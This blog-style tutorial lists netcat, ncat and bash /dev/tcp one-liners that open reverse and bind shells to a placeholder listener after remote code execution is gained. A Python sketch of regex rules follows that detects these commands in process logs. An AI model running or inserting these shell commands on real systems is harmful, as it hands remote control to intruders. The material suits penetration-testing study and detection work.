vihost.blogg.se

Bash netcat reverse shell

Often when I get remote command execution on a Linux system (for example, once I've planted my one-line PHP script), the next step is getting a remote shell. Usually an nc listener would be used to receive the reverse shell, and I normally start it with the -v option so that it will show when a connection is received.

If nc or ncat is installed, it should be fairly simple to send the shell to my listener. Something like this should send a reverse shell to an nc listener running on DEST_IP:DEST_PORT:

    nc DEST_IP DEST_PORT -e /bin/bash

Or I could set up a bind shell on the system, then connect to it later using nc:

    nc -lp 4444 -e /bin/bash

It should be noted that some versions of nc (e.g. BSD) don't need the -p option if -l is specified (in fact it is not valid to use -p with -l on those versions), and some don't have the -e option.

It may be even better to use the -c switch instead of -e if it is available, because then you can pass more than an executable name to execute. This example forwards stderr as well as stdout from bash:

    nc DEST_IP DEST_PORT -c "/bin/bash 2>&1"

If there is no -e option, there are ways around it. One example is to use two nc listeners connected to bash, one to send commands and one to receive output:

    nc DEST_IP DEST_PORT | /bin/bash 2>&1 | nc DEST_IP DEST_PORT+1

This is not very elegant, but it does work. We can temporarily create a named pipe and use that to connect to a single nc listener:

    mkfifo /tmp/pipe
    cat /tmp/pipe|nc DEST_IP DEST_PORT|/bin/bash &>/tmp/pipe
    rm /tmp/pipe

There might also be ncat available on the system, which can be used just like nc in the first 4 examples above, and ncat provides options like --ssl which can be used to encrypt traffic and even verify identity.

If no versions of netcat are installed, we can always try bash redirection. If commands are running in bash, then great, we can use bash's TCP redirections like this:

    bash &>/dev/tcp/DEST_IP/DEST_PORT <&1

Check whether commands are running inside bash with:

    echo $0
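Seen from the defending side, each of the one-liners above leaves a recognisable process command line. The following Python sketch is an added example, not part of the original post: it matches the patterns shown on this page against constructed sample command lines. The rule names, the `scan` function and the 192.0.2.10 address are assumptions made for illustration.

```python
import re

# Patterns for the one-liners shown on this page. Pipes and redirections are
# interpreted by the shell, so they only show up in process telemetry when the
# whole string is handed to `sh -c` / `bash -c` (as a web script's command
# execution typically does); the rules therefore match on full command lines.
NC = r"\b(?:nc|ncat|netcat)\b"
SHELL = r"[\"']?(?:/\S*/)?(?:ba|da|z|k)?sh\b"  # sh/bash/dash/zsh/ksh, optional path

RULES = [
    # nc ... -e /bin/bash   or   nc ... -c "/bin/bash 2>&1"
    ("nc -e/-c shell", re.compile(NC + r"[^|;]*\s-[a-z]*[ec]\s+" + SHELL)),
    # nc ... | /bin/bash    (two-listener and named-pipe variants)
    ("nc piped into shell", re.compile(NC + r"[^|;]*\|\s*" + SHELL)),
    # bash &>/dev/tcp/HOST/PORT <&1
    ("/dev/tcp redirection", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
]

def scan(cmdlines):
    """Return [(index, [rule names])] for every command line that matches."""
    hits = []
    for i, line in enumerate(cmdlines):
        names = [name for name, rx in RULES if rx.search(line)]
        if names:
            hits.append((i, names))
    return hits

# Constructed sample command lines (192.0.2.10 is a documentation address).
SAMPLE = [
    "sh -c nc 192.0.2.10 4444 -e /bin/bash",
    "nc -lp 4444 -e /bin/bash",
    'sh -c nc 192.0.2.10 4444 -c "/bin/bash 2>&1"',
    "sh -c nc 192.0.2.10 4444 | /bin/bash 2>&1 | nc 192.0.2.10 4445",
    "sh -c mkfifo /tmp/pipe; cat /tmp/pipe|nc 192.0.2.10 4444|/bin/bash &>/tmp/pipe",
    "bash -c bash &>/dev/tcp/192.0.2.10/4444 <&1",
    "nc -zv 192.0.2.10 22",          # benign port check
    "bash /opt/backup/run.sh",       # benign script run
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE):
        print(f"{SAMPLE[idx]!r}: {', '.join(names)}")
```

The rules key on command-line text only, so an ncat session wrapped in --ssl is still caught at process start even though its traffic is encrypted on the wire.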










